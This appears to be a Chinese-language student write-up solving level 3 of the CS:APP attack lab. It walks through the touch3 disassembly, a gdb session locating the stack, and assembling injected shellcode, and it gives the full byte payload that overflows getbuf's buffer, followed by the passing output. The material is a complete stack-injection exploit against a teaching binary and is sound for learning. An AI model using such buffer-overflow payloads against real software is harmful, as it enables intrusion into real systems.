1.简单分析touch3
00000000004018fa <touch3>: 4018fa: 53 push %rbx 4018fb: 48 89 fb mov %rdi,%rbx 4018fe: c7 05 d4 2b 20 00 03 movl $0x3,0x202bd4(%rip) # 6044dc <vlevel> 401905: 00 00 00 401908: 48 89 fe mov %rdi,%rsi 40190b: 8b 3d d3 2b 20 00 mov 0x202bd3(%rip),%edi # 6044e4 <cookie> 401911: e8 36 ff ff ff callq 40184c <hexmatch> 401916: 85 c0 test %eax,%eax逻辑非常简单首先把rdi的值传递给rsi然后把cookie的值传递给rdi调用hexmatch函数。这里rsi的值应该就是我们的字符串数组的起始地址。
这里我们注意hexmatch函数里也开辟了栈帧。并且还有随机栈偏移动。可以说字符串s的地址我们是没法估计 的。并且提示中告诉了我们hexmatch和strncmp函数可能会覆盖我们getbuf的缓冲区。所以我们的注入代码要放在一个安全的位置。我们可以把它放到text的栈帧中。我们在getbuf分配栈帧之前打一个断点。
b *0x4017a8
(gdb) b *0x4017a8 Breakpoint 1 at 0x4017a8: file buf.c, line 12. (gdb) r -q Starting program: /csapp/attack/ctarget -q warning: Error disabling address space randomization: Operation not permitted Missing separate debuginfos, use: yum debuginfo-install glibc-2.28-127.el8.x86_64 Cookie: 0x59b997fa Breakpoint 1, getbuf () at buf.c:12 12 buf.c: No such file or directory. (gdb) info r rsp rsp 0x5561dca0 0x5561dca0可以发现我们text的rsp地址现在为0x5561dca0 可以发现这里面存储了本来getbuf的返回地址也就下一条指令
(gdb) x 0x5561dca0 0x5561dca0: 0x00401976 //正常的getbuf会返回到如下 0x401976: 89 c2 mov %eax,%edx这里分析一下getbuf刚分配完之后的栈帧。这里需要停下来整理一下
0x5561dca80x5561dca0 getbuf的返回地址(text的栈帧) 00 00 00 00 00 40 19 76
rsp+20(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+18(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+10(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+8(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp(getbuf的栈帧) 00 00 00 00 00 00 00 00
由于我们在调用touch3的时候只需要传递给他一个字符串数组的起始地址这里我们可以利用缓冲区溢出把cookie的字符串输入到0x5561dca8 然后在利用缓冲区溢出把getbuf的返回地址设置成rsp的地址。利用level2的技巧执行我们的汇编指令。
movq $0x5561dca8 %rdi pushq 0x4018fa retq看一下这段汇编代码的字节表示
[root@cadc591c8a87 attack]# gcc -c l3.s l3.s: Assembler messages: l3.s: Warning: end of file not at end of a line; newline inserted [root@cadc591c8a87 attack]# objdump -d l3.o l3.o: file format elf64-x86-64 Disassembly of section .text: 0000000000000000 <.text>: 0: 48 c7 c7 a8 dc 61 55 mov $0x5561dca8,%rdi 7: 68 fa 18 40 00 pushq 0x4018fa e: c3 retq好现在开始构造我们的输入。这里先看一下cookie的ascll表示35 39 62 39 39 37 66 61好了下面开始我们的输入构造
48 c7 c7 a8 dc 61 55 68 <-读入我们要执行的汇编语句 fa 18 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 dc 61 55 00 00 00 00 35 39 62 39 39 37 66 61 <-返回地址为rsp来试试能不能通过。发现可以正常通过
[root@cadc591c8a87 attack]# ./hex2raw < touch3.txt | ./ctarget -q Cookie: 0x59b997fa Type string:Touch3!: You called touch3("59b997fa") Valid solution for level 3 with target ctarget PASS: Would have posted the following: user id bovik course 15213-f15 lab attacklab result 1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61